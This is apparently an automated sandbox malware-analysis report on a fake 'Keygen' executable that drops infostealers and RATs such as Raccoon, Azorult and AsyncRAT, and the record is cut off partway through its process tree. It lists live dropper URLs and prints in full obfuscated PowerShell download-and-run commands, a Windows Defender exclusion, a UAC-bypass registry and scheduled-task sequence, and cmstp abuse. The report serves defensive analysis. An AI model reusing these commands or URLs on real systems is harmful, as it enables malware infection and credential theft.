Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    154s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (17) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 01:38:47 GMT Bot_ID: 750D7400-3B08-415E-A8B0-2695D81425F5_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.13 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: UCQFZDUI - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (454 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 3 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 25 IoCs
  • Loads dropped DLL 51 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (17) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (17) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1468
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\E6D6.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (17) — ?????.exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:612
      • C:\Users\Admin\AppData\Local\Temp\E6D6.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1868
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\E6D6.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1564
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1848
          • C:\Users\Public\xhe.exe
            "C:\Users\Public\xhe.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2536
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2720
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2964
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2964 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\335960853025919\\* & exit
                  8⤵
                    PID:3036
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 2964
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2604
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2752
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:3040
              • C:\Users\Public\xhe.exe
                "C:\Users\Public\xhe.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                • Modifies system certificate store
                PID:2848
                • C:\Users\Admin\AppData\Local\Temp\1r9Ud0xVX8.exe
                  "C:\Users\Admin\AppData\Local\Temp\1r9Ud0xVX8.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1972
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\1r9Ud0xVX8.exe"'
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1196
                • C:\Users\Admin\AppData\Local\Temp\B6qMvGvaTD.exe
                  "C:\Users\Admin\AppData\Local\Temp\B6qMvGvaTD.exe"
                  7⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  PID:2348
                  • C:\Windows\SysWOW64\Notepad.exe
                    "C:\Windows\System32\Notepad.exe"
                    8⤵
                      PID:788
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c C:\Users\Public\Natso.bat
                        9⤵
                          PID:2124
                          • C:\Windows\SysWOW64\reg.exe
                            reg delete hkcu\Environment /v windir /f
                            10⤵
                            • Modifies registry key
                            PID:1960
                          • C:\Windows\SysWOW64\reg.exe
                            reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
                            10⤵
                            • Modifies registry key
                            PID:1560
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                            10⤵
                              PID:268
                            • C:\Windows\SysWOW64\reg.exe
                              reg delete hkcu\Environment /v windir /f
                              10⤵
                              • Modifies registry key
                              PID:2280
                        • C:\Program Files (x86)\internet explorer\ieinstal.exe
                          "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                          8⤵
                            PID:860
                        • C:\Users\Admin\AppData\Local\Temp\9q16E9MFse.exe
                          "C:\Users\Admin\AppData\Local\Temp\9q16E9MFse.exe"
                          7⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of SetWindowsHookEx
                          PID:2640
                          • \??\c:\windows\SysWOW64\cmstp.exe
                            "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\alapxjj1.inf
                            8⤵
                              PID:2984
                          • C:\Users\Admin\AppData\Local\Temp\TSBpamNrNo.exe
                            "C:\Users\Admin\AppData\Local\Temp\TSBpamNrNo.exe"
                            7⤵
                            • Executes dropped EXE
                            • Windows security modification
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1164
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "powershell" Get-MpPreference -verbose
                              8⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:992
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\xhe.exe"
                            7⤵
                              PID:2812
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout /T 10 /NOBREAK
                                8⤵
                                • Delays execution with timeout.exe
                                PID:2152
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\E6D6.tmp\m1.hta"
                      3⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of WriteProcessMemory
                      PID:1572
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:820
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout 1
                      3⤵
                      • Delays execution with timeout.exe
                      PID:1944
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\E6D6.tmp\b.hta"
                      3⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of WriteProcessMemory
